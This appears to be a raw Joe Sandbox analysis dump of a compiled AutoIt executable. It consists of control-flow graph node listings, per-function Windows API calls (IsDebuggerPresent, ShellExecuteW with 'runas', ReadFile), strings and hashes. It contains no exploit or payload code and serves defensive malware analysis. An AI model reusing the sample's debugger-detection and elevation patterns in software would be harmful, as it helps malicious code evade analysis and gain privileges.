87498 41d988 87497->87498 87498->87495 87499 414139 __stbuf 46 API calls 87498->87499 87500 41d994 87499->87500 87500->87495 87501 414139 __stbuf 46 API calls 87500->87501 87502 41d9a1 87501->87502 87503 414139 __stbuf 46 API calls 87502->87503 87503->87495 87504->87449 87505->87438 87506->87441 87507->87449 87509 41da31 87508->87509 87510 41da4c 87508->87510 87512 417f8a __read_nolock 46 API calls 87509->87512 87511 41da5b 87510->87511 87513 41da7a 87510->87513 87514 417f8a __read_nolock 46 API calls 87511->87514 87515 41da36 87512->87515 87517 41da98 87513->87517 87528 41daac 87513->87528 87516 41da60 87514->87516 87518 417f77 __mtinitlocknum 46 API calls 87515->87518 87519 417f77 __mtinitlocknum 46 API calls 87516->87519 87520 417f8a __read_nolock 46 API calls 87517->87520 87529 41da3e 87518->87529 87522 41da67 87519->87522 87524 41da9d 87520->87524 87521 41db02 87523 417f8a __read_nolock 46 API calls 87521->87523 87525 417f25 _W_expandtime 10 API calls 87522->87525 87526 41db07 87523->87526 87527 417f77 __mtinitlocknum 46 API calls 87524->87527 87525->87529 87530 417f77 __mtinitlocknum 46 API calls 87526->87530 87531 41daa4 87527->87531 87528->87521 87528->87529 87532 41dae1 87528->87532 87533 41db1b 87528->87533 87529->87480 87530->87531 87534 417f25 _W_expandtime 10 API calls 87531->87534 87532->87521 87537 41daec ReadFile 87532->87537 87535 416b04 __malloc_crt 46 API calls 87533->87535 87534->87529 87538 41db31 87535->87538 87539 41dc17 87537->87539 87540 41df8f GetLastError 87537->87540 87543 41db59 87538->87543 87544 41db3b 87538->87544 87539->87540 87547 41dc2b 87539->87547 87541 41de16 87540->87541 87542 41df9c 87540->87542 87551 417f9d __dosmaperr 46 API calls 87541->87551 87556 41dd9b 87541->87556 87545 417f77 __mtinitlocknum 46 API calls 87542->87545 87548 420494 __lseeki64_nolock 48 API calls 87543->87548 87546 417f77 __mtinitlocknum 46 API calls 87544->87546 87549 41dfa1 87545->87549 87550 41db40 87546->87550 87547->87556 87557 41dc47 87547->87557 
87560 41de5b 87547->87560 87552 41db67 87548->87552 87553 417f8a __read_nolock 46 API calls 87549->87553 87554 417f8a __read_nolock 46 API calls 87550->87554 87551->87556 87552->87537 87553->87556 87554->87529 87555 413748 _free 46 API calls 87555->87529 87556->87529 87556->87555 87558 41dcab ReadFile 87557->87558 87565 41dd28 87557->87565 87562 41dcc9 GetLastError 87558->87562 87568 41dcd3 87558->87568 87559 41ded0 ReadFile 87563 41deef GetLastError 87559->87563 87569 41def9 87559->87569 87560->87556 87560->87559 87561 41ddec MultiByteToWideChar 87561->87556 87564 41de10 GetLastError 87561->87564 87562->87557 87562->87568 87563->87560 87563->87569 87564->87541 87565->87556 87566 41dda3 87565->87566 87567 41dd96 87565->87567 87573 41dd60 87565->87573 87566->87573 87574 41ddda 87566->87574 87570 417f77 __mtinitlocknum 46 API calls 87567->87570 87568->87557 87571 420494 __lseeki64_nolock 48 API calls 87568->87571 87569->87560 87572 420494 __lseeki64_nolock 48 API calls 87569->87572 87570->87556 87571->87568 87572->87569 87573->87561 87575 420494 __lseeki64_nolock 48 API calls 87574->87575 87576 41dde9 87575->87576 87576->87561 87577->87461 87578->87474 87579->87463 87580->87470 87581->87474 87582->87471 87583->87470 87584->87481 87585->87480 87586->87474 87588 416b04 __malloc_crt 46 API calls 87587->87588 87589 420618 87588->87589 87589->87490 87590->87487 87591->87495 87595 4148b3 GetSystemTimeAsFileTime __aulldiv 87592->87595 87594 442c6b 87594->87098 87595->87594 87596->87106 87597->87110 87598->87110 87604 45272f __tzset_nolock _wcscpy 87599->87604 87600 414d04 61 API calls __fread_nolock 87600->87604 87601 44afef GetSystemTimeAsFileTime 87601->87604 87602 4528a4 87602->87020 87602->87021 87603 4150d1 81 API calls _fseek 87603->87604 87604->87600 87604->87601 87604->87602 87604->87603 87606 44b1bc 87605->87606 87607 44b1ca 87605->87607 87608 4149c2 116 API calls 87606->87608 87609 44b1e1 87607->87609 87610 4149c2 116 API calls 87607->87610 87611 44b1d8 
87607->87611 87608->87607 87640 4321a4 87609->87640 87612 44b2db 87610->87612 87611->87047 87612->87609 87615 44b2e9 87612->87615 87614 44b224 87616 44b253 87614->87616 87617 44b228 87614->87617 87618 44b2f6 87615->87618 87620 414a46 __fcloseall 82 API calls 87615->87620 87644 43213d 87616->87644 87619 44b235 87617->87619 87622 414a46 __fcloseall 82 API calls 87617->87622 87618->87047 87623 44b245 87619->87623 87625 414a46 __fcloseall 82 API calls 87619->87625 87620->87618 87622->87619 87623->87047 87624 44b25a 87626 44b260 87624->87626 87627 44b289 87624->87627 87625->87623 87629 44b26d 87626->87629 87632 414a46 __fcloseall 82 API calls 87626->87632 87654 44b0bf 87 API calls 87627->87654 87630 44b27d 87629->87630 87633 414a46 __fcloseall 82 API calls 87629->87633 87630->87047 87631 44b28f 87655 4320f8 46 API calls _free 87631->87655 87632->87629 87633->87630 87635 44b2a2 87638 44b2b2 87635->87638 87639 414a46 __fcloseall 82 API calls 87635->87639 87636 44b295 87636->87635 87637 414a46 __fcloseall 82 API calls 87636->87637 87637->87635 87638->87047 87639->87638 87641 4321b4 __tzset_nolock _memmove 87640->87641 87642 4321cb 87640->87642 87641->87614 87643 414d04 __fread_nolock 61 API calls 87642->87643 87643->87641 87645 4135bb _malloc 46 API calls 87644->87645 87646 432150 87645->87646 87647 4135bb _malloc 46 API calls 87646->87647 87648 432162 87647->87648 87649 4135bb _malloc 46 API calls 87648->87649 87650 432174 87649->87650 87652 432189 87650->87652 87656 4320f8 46 API calls _free 87650->87656 87652->87624 87653 432198 87653->87624 87654->87631 87655->87636 87656->87653 87657->86951 87658->86953 87659->86968 87660->86968 87661->86968 87662->86962 87663->86968 87664->86968 87665->86976 87666->86985 87667->86984 87668->86984 87718 410160 87669->87718 87671 41012f GetFullPathNameW 87672 410147 ctype 87671->87672 87672->86805 87674 4102cb SHGetDesktopFolder 87673->87674 87677 410333 _wcsncpy 87673->87677 87675 4102e0 _wcsncpy 87674->87675 87674->87677 87676 41031c 
SHGetPathFromIDListW 87675->87676 87675->87677 87676->87677 87677->86809 87679 4101bb 87678->87679 87683 425f4a 87678->87683 87680 410160 52 API calls 87679->87680 87681 4101c7 87680->87681 87722 410200 52 API calls 2 library calls 87681->87722 87682 4114ab __wcsicoll 58 API calls 87682->87683 87683->87682 87685 425f6e 87683->87685 87685->86811 87686 4101d6 87723 410200 52 API calls 2 library calls 87686->87723 87688 4101e9 87688->86811 87690 40f760 128 API calls 87689->87690 87691 40f584 87690->87691 87692 429335 87691->87692 87693 40f58c 87691->87693 87694 4528bd 118 API calls 87692->87694 87695 40f598 87693->87695 87696 429358 87693->87696 87697 42934b 87694->87697 87748 4033c0 113 API calls 7 library calls 87695->87748 87749 434034 86 API calls _wprintf 87696->87749 87701 429373 87697->87701 87702 42934f 87697->87702 87700 40f5b4 87700->86808 87705 4115d7 52 API calls 87701->87705 87704 431e58 82 API calls 87702->87704 87703 429369 87703->87701 87704->87696 87717 4293c5 ctype 87705->87717 87706 42959c 87707 413748 _free 46 API calls 87706->87707 87708 4295a5 87707->87708 87709 431e58 82 API calls 87708->87709 87710 4295b1 87709->87710 87714 401b10 52 API calls 87714->87717 87717->87706 87717->87714 87724 444af8 87717->87724 87727 44b41c 87717->87727 87734 402780 87717->87734 87742 4022d0 87717->87742 87750 44c7dd 64 API calls 3 library calls 87717->87750 87719 410167 _wcslen 87718->87719 87720 4115d7 52 API calls 87719->87720 87721 41017e _wcscpy 87720->87721 87721->87671 87722->87686 87723->87688 87725 4115d7 52 API calls 87724->87725 87726 444b27 _memmove 87725->87726 87726->87717 87728 44b429 87727->87728 87729 4115d7 52 API calls 87728->87729 87730 44b440 87729->87730 87731 44b45e 87730->87731 87732 401b10 52 API calls 87730->87732 87731->87717 87733 44b453 87732->87733 87733->87717 87735 402827 87734->87735 87738 402790 ctype _memmove 87734->87738 87737 4115d7 52 API calls 87735->87737 87736 4115d7 52 API calls 87739 402797 87736->87739 87737->87738 
87738->87736 87740 4027bd 87739->87740 87741 4115d7 52 API calls 87739->87741 87740->87717 87741->87740 87743 4022e0 87742->87743 87745 40239d 87742->87745 87744 4115d7 52 API calls 87743->87744 87743->87745 87746 402320 ctype 87743->87746 87744->87746 87745->87717 87746->87745 87747 4115d7 52 API calls 87746->87747 87747->87746 87748->87700 87749->87703 87750->87717 87752 402417 87751->87752 87756 402539 ctype 87751->87756 87753 4115d7 52 API calls 87752->87753 87752->87756 87754 402443 87753->87754 87755 4115d7 52 API calls 87754->87755 87758 4024b4 87755->87758 87756->86815 87758->87756 87759 4022d0 52 API calls 87758->87759 87780 402880 95 API calls 2 library calls 87758->87780 87759->87758 87764 401566 87760->87764 87761 401794 87781 40e9a0 90 API calls 87761->87781 87764->87761 87765 4010a0 52 API calls 87764->87765 87766 40167a 87764->87766 87765->87764 87767 4017c0 87766->87767 87782 45e737 90 API calls 3 library calls 87766->87782 87767->86817 87769 40bc70 52 API calls 87768->87769 87778 40d451 87769->87778 87770 40d50f 87785 410600 52 API calls 87770->87785 87772 427c01 87786 45e737 90 API calls 3 library calls 87772->87786 87773 40e0a0 52 API calls 87773->87778 87775 401b10 52 API calls 87775->87778 87776 40d519 87776->86820 87778->87770 87778->87772 87778->87773 87778->87775 87778->87776 87783 40f310 53 API calls 87778->87783 87784 40d860 91 API calls 87778->87784 87780->87758 87781->87766 87782->87767 87783->87778 87784->87778 87785->87776 87786->87776 87787->86833 87788->86834 87790 42c5fe 87789->87790 87842 4091c6 87789->87842 87791 40bc70 52 API calls 87790->87791 87790->87842 87792 42c64e InterlockedIncrement 87791->87792 87793 42c665 87792->87793 87798 42c697 87792->87798 87795 42c672 InterlockedDecrement Sleep InterlockedIncrement 87793->87795 87793->87798 87794 42c737 InterlockedDecrement 87796 42c74a 87794->87796 87795->87793 87795->87798 87799 408f40 VariantClear 87796->87799 87797 42c731 87797->87794 87798->87794 87798->87797 88073 408e80 
87798->88073 87801 42c752 87799->87801 88082 410c60 VariantClear ctype 87801->88082 87802 42c6cf 88077 45340c 85 API calls 87802->88077 87805 42c6db 87806 402160 52 API calls 87805->87806 87807 42c6e5 87806->87807 88078 45340c 85 API calls 87807->88078 87809 42c6f1 88079 40d200 52 API calls 2 library calls 87809->88079 87811 42c6fb 88080 465124 53 API calls 87811->88080 87813 42c715 87814 42c76a 87813->87814 87815 42c719 87813->87815 87816 401b10 52 API calls 87814->87816 88081 46fe32 VariantClear 87815->88081 87818 42c77e 87816->87818 87819 401980 53 API calls 87818->87819 87825 42c796 87819->87825 87820 42c812 88084 46fe32 VariantClear 87820->88084 87822 42c82a InterlockedDecrement 88085 46ff07 54 API calls 87822->88085 87824 42c864 88086 45e737 90 API calls 3 library calls 87824->88086 87825->87820 87825->87824 88083 40ba10 52 API calls 2 library calls 87825->88083 87828 42c9ec 88129 47d33e 329 API calls 87828->88129 87830 42c9fe 88130 46feb1 VariantClear VariantClear 87830->88130 87832 42ca08 87834 401b10 52 API calls 87832->87834 87833 408f40 VariantClear 87843 42c849 87833->87843 87837 42ca15 87834->87837 87835 408f40 VariantClear 87838 42c891 87835->87838 87836 402780 52 API calls 87836->87843 87839 40c2c0 52 API calls 87837->87839 88087 410c60 VariantClear ctype 87838->88087 87844 42c874 87839->87844 87841 401980 53 API calls 87841->87843 87842->86893 87843->87828 87843->87833 87843->87836 87843->87841 88088 40a780 87843->88088 87844->87835 87846 42ca59 87844->87846 87846->87846 87848 40afc4 87847->87848 87849 40b156 87847->87849 87850 40afd5 87848->87850 87851 42d1e3 87848->87851 88140 45e737 90 API calls 3 library calls 87849->88140 87854 40a780 192 API calls 87850->87854 87872 40b11a ctype 87850->87872 88141 45e737 90 API calls 3 library calls 87851->88141 87856 40b00a 87854->87856 87855 42d1f8 87859 408f40 VariantClear 87855->87859 87856->87855 87864 40b012 87856->87864 87858 42d4db 87858->87858 87860 40b143 87859->87860 87860->86893 87861 40b04a 87871 
APIs
• _wcslen.LIBCMT ref: 004096C1
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 0040970C
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
• _memmove.LIBCMT ref: 00409D96
• _memmove.LIBCMT ref: 0040A6C4
• _memmove.LIBCMT ref: 004297E5
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
• String ID:
• API String ID: 2383988440-0
• Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
• Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
• Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
• runas, xrefs: 0042E2AD, 0042E2DC
• This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                        • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                        • API String ID: 2495805114-3383388033
                                                                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                        Control-flow Graph
                                                                                                        control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1929 427698-4276a8 1920->1929 1921->1919 1925 427636-427640 1922->1925 1926 42762b-427631 1922->1926 1927 40e5a5-40e5ae 1923->1927 1928 427654-427657 1923->1928 1925->1918 1926->1918 1932 40e5b4 1927->1932 1933 427645-42764f 1927->1933 1928->1918 1931 42765d-42766f 1928->1931 1934 4276b0 1929->1934 1935 4276aa-4276ae 1929->1935 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                        • String ID: 0SH$ou
                                                                                                        • API String ID: 3363477735-1412203762
                                                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                                                        • API String ID: 2574300362-3542929980
                                                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                        APIs
                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 3403648963-3837949563
                                                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                        APIs
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                        • API String ID: 1762048999-758534266
                                                                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
